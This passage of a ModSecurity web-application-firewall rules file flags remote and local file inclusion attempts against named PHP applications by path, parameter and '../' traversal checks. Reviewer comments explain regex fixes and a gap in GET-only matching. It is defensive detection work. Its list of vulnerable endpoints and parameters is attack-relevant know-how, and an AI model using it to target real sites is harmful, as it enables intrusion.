index.php gallery',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23534'" SecRule &TX:'/RFI.*ARGS:gallery/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Simple PHP Script Gallery Remote Inclusion index.php gallery',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Simple Text-File Login script slogin_path parameter remote file inclusion SecRule REQUEST_LINE "@contains /slogin_lib.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008996,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Simple Text-File Login script slogin_path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32811'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:slogin_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Simple Text-File Login script slogin_path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010564) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Sisplet CMS komentar.php site_path Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /main/forum/komentar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010564,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Sisplet CMS komentar.php site_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,23334'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:site_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sisplet CMS komentar.php site_path Parameter Remote File Inclusion 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009070) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter local file inclusion SecRule REQUEST_LINE "@contains /login.tpl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009070,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33092'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:TplSuffix "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009071) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpSkelSite theme parameter remote file inclusion SecRule REQUEST_LINE "@contains /login.tpl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009071,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpSkelSite theme parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,33092'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:theme/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpSkelSite theme parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009179) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /vars.inc.php" 
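"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009179,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
# Rule 2009179, last link: counts TX entries whose name matches the regex, i.e.
# entries stored under the tx.<id>-WEB_ATTACK/RFI-<variable name> convention for
# this parameter. Unescaped, [SCRIPT_PATH] is a regex character class (one
# character from that set), so the original selector could not match a name
# ending in ARGS:_SESSION[SCRIPT_PATH] and the chain never completed for the
# parameter it documents. Each bracket is now matched with "." so the selector
# needs no backslash escapes inside the quoted variable name.
SecRule &TX:'/RFI.*ARGS:_SESSION.SCRIPT_PATH./' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009180) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Remote File Inclusion
# NOTE(review): the "@contains GET " link limits this chain to request lines
# that contain "GET "; the same parameter sent with another method is presumably
# not scored by this rule - confirm that gap is acceptable for this application.
SecRule REQUEST_LINE "@contains /pcltar.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009180,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:g_pcltar_lib_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion
# The last link of this chain (continued on the next line) selects the argument
# by its literal name rather than by regex, so the brackets are not a character
# class there. It looks for "../" in that argument's value.
SecRule REQUEST_LINE "@contains /vars.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009181,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:_SESSION[SCRIPT_PATH] 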
"@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009182) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /pcltar.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009182,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:g_pcltar_lib_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011051) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -1 SecRule REQUEST_LINE "@contains /content/themes/softsaurus_default/pages/subHeader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011051,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -1',tag:'web-application-attack',tag:'bugtraq,38842'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:objects_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # 
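(2011052) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -2
# Chain for 2011052: request line contains the softsaurus_stretched
# subHeader.php path, contains "GET ", and at least one TX entry exists whose
# name matches RFI.*ARGS:objects_path. On a full match the rule adds the
# critical anomaly score and records the matched variable under a
# tx.<id>-WEB_ATTACK/RFI-<variable name> key.
# NOTE(review): the "GET " link means the same parameter sent with another
# method is presumably not scored by this rule - confirm that is intended.
SecRule REQUEST_LINE "@contains /content/themes/softsaurus_stretched/pages/subHeader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011052,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -2',tag:'web-application-attack',tag:'bugtraq,38842'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:objects_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Softsaurus CMS subHeader.php objects_path Parameter Remote File Inclusion -2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009144) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Sourdough neededFiles Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /example_clientside_javascript.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009144,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Sourdough neededFiles Parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
# The parameter name contains literal brackets. Unescaped, [patForms] is a regex
# character class (one character from that set), so the original selector could
# not match a TX name ending in ARGS:neededFiles[patForms] and the rule stayed
# silent for the parameter it documents. Each bracket is now matched with "."
# so the selector needs no backslash escapes inside the quoted variable name.
SecRule &TX:'/RFI.*ARGS:neededFiles.patForms./' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sourdough neededFiles Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009145) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /preview.php" 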
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009145,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33601'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:synTarget "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009229) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Remote File Inclusion SecRule REQUEST_LINE "@contains /body_default.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009229,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2009-0441'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:shop_this_skin_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009230) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion SecRule REQUEST_LINE "@contains /body_default.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009230,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2009-0441'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:shop_this_skin_path "@contains 
../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003705) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion site_conf.php ordnertiefe SecRule REQUEST_LINE "@contains /site_conf.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003705,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion site_conf.php ordnertiefe',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:ordnertiefe)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion site_conf.php ordnertiefe',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003706) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion class.csv.php tt_docroot SecRule REQUEST_LINE "@contains /class.csv.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003706,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion class.csv.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion class.csv.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003707) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie.php tt_docroot SecRule REQUEST_LINE "@contains /produkte_nach_serie.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003707,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003708) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot SecRule REQUEST_LINE "@contains /functionen/ref_kd_rubrik.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003708,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003709) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion hg_referenz_jobgalerie.php tt_docroot SecRule REQUEST_LINE "@contains /hg_referenz_jobgalerie.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003709,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion hg_referenz_jobgalerie.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget 
CMS Remote Inclusion hg_referenz_jobgalerie.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003710) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_anmeldung_NWL.php tt_docroot SecRule REQUEST_LINE "@contains /surfer_anmeldung_NWL.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003710,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_anmeldung_NWL.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_anmeldung_NWL.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003711) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie_alle.php tt_docroot SecRule REQUEST_LINE "@contains /produkte_nach_serie_alle.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003711,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie_alle.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie_alle.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003712) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_aendern.php tt_docroot SecRule REQUEST_LINE "@contains /surfer_aendern.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003712,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_aendern.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_aendern.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003715) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot SecRule REQUEST_LINE "@contains /ref_kd_rubrik.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003715,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003713) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion referenz.php tt_docroot SecRule REQUEST_LINE "@contains /module/referenz.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003713,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion referenz.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion referenz.php 
tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003714) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion lay.php tt_docroot SecRule REQUEST_LINE "@contains /standard/1/lay.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003714,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion lay.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion lay.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003867) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion 3_lay.php tt_docroot SecRule REQUEST_LINE "@contains /standard/3/lay.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003867,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion 3_lay.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion 3_lay.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009169) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Thyme export.php export_to Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /export.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009169,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Thyme export.php 
export_to Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33731'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:export_to "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Thyme export.php export_to Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009789) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /examples/tbs_us_examples_0view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009789,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:script "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003669) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TopTree Remote Inclusion Attempt -- tpl_message.php right_file SecRule REQUEST_LINE "@contains /templates/default/tpl_message.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003669,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS TopTree Remote Inclusion Attempt -- tpl_message.php right_file',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3854'" SecRule &TX:'/RFI.*ARGS:right_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TopTree Remote Inclusion Attempt -- tpl_message.php 
right_file',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009663) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009663,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34617'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:inc_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009726) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /config.php" 